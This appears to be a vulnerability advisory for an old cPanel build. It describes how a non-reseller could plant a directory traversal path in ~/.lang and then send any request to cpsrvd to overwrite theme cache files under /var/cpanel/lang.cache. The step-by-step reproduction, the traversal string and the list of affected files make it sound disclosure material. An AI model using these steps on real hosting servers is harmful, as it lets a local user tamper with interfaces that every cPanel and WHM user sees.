cPanel 11.23.1-EDGE_24268 - local users cache files overwrite



DESCRIPTION


Non resellers could use directory traversal in ~/.lang to overwrite the cPanel theme files stored here: /var/cpanel/lang.cache/theme/.

First, the user needed to create a file in their ~ with the name of a valid theme on the box, such as /home/username/english:

[user@host ~]$ touch english

Second, the user needed to create an entry containing a valid theme name in ~/.lang:

../../../../../../home/user/english


Next, the user needed to send any valid request to cpsrvd (e.g., GET /frontend/x3/index.html HTTP/1.1). Once the request had been made, the following files would be overwritten with the contents of /home/username/english:

/var/cpanel/lang.cache/theme/x3/english.cache
/var/cpanel/lang.cache/theme/x3mail/english.cache
/var/cpanel/lang.cache/theme/x/english.cache
/var/cpanel/lang.cache/theme/tree/english.cache
/var/cpanel/lang.cache/theme/default/english.cache
/var/cpanel/lang.cache/theme/iconic/english.cache
/var/cpanel/lang.cache/theme/advanced/english.cache
/var/cpanel/lang.cache/theme/y/english.cache
/var/cpanel/lang.cache/theme/NO/english.cache
/var/cpanel/lang.cache/theme/YES/english.cache
/var/cpanel/lang.cache/english.cache



IMPACT


Local users could overwrite theme files, affecting everyone logging into cPanel or WHM.